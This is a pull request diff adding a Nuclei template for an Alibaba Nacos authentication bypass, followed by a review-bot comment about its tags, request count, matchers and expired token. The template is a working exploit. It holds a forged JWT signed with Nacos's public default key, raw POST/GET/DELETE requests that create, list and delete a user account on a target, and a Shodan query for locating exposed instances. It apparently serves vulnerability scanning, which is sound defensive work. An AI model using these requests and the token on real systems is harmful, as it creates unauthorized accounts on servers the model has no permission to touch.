Merge pull request #8106 from projectdiscovery/nacos-create-user
Create nacos-create-user.yamlpatch-1
commit
1bdd90dbb4
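--- /dev/null
+++ b/nacos-create-user.yaml
@@ -0,0 +1,42 @@
+id: nacos-create-user
+
+info:
+name: Alibaba Nacos - Unauthorized Account Creation
+author: SleepingBag945
+severity: high
+description: |
+Nacos uses a fixed JWT token key to authenticate users in the default configuration. Since Nacos is an open source project, the key is publicly known, so unauthorized attackers can use this fixed key to forge any user identity Log in to Nacos to manage and operate background interface functions.
+reference:
+- https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/nacos-token-create-user.yaml
+metadata:
+max-request: 1
+verified: true
+shodan-query: title:"Nacos"
+tags: nacos,unauth,bypass,instrusive
+
+http:
+- raw:
+- |
+POST /nacos/v1/auth/users/?username={{randstr_1}}&password={{randstr_2}}&accessToken={{token}} HTTP/1.1
+Host: {{Hostname}}
+
+- |
+GET /nacos/v1/auth/users?pageNo=1&pageSize=9&search=blur&accessToken={{token}} HTTP/1.1
+Host: {{Hostname}}
+
+- |
+DELETE /nacos/v1/auth/users/?username={{randstr_1}}&accessToken={{token}} HTTP/1.1
+Host: {{Hostname}}
+
+payloads:
+token:
+- eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY5ODg5NDcyN30.feetKmWoPnMkAebjkNnyuKo6c21_hzTgu0dfNqbdpZQ
+attack: pitchfork
+
+matchers-condition: and
+matchers:
+- type: dsl
+dsl:
+- "status_code_1 == 200 && contains(body_1,'create user ok!')"
+- "status_code_3 == 200 && contains(body_3,'delete user ok!')"
+condition: and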
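Review bot: The tag on the `tags:` line is misspelled as `instrusive`, so runs that exclude intrusive templates (`-etags intrusive`) will still execute this one, which creates and then deletes an account on the target; change it to `tags: nacos,unauth,bypass,intrusive`. `max-request: 1` under `metadata:` does not match the three raw requests in the `http` block (POST, GET, DELETE), all of which a single pitchfork payload sends, so it should read `max-request: 3`. The second request (the GET user listing) is referenced by no matcher, so either drop it or add a `body_2` condition; and because the single DSL matcher also requires `delete user ok!` from request 3, a successful creation whose cleanup fails produces no finding while leaving the test account behind — consider matching on the creation result alone and treating the DELETE as best-effort cleanup whose failure is surfaced rather than hidden. The hard-coded JWT in `payloads.token` carries a fixed `exp` claim (its middle segment decodes to `{"sub":"nacos","exp":1698894727}`, i.e. 2023-11-02), after which the template silently yields false negatives, so at minimum add a comment above it such as `# token embeds a fixed exp (1698894727 = 2023-11-02); once expired this template is a silent false negative`. Indentation appears to have been stripped by the page rendering, so the nesting of these keys is inferred from the Nuclei template schema rather than visible here.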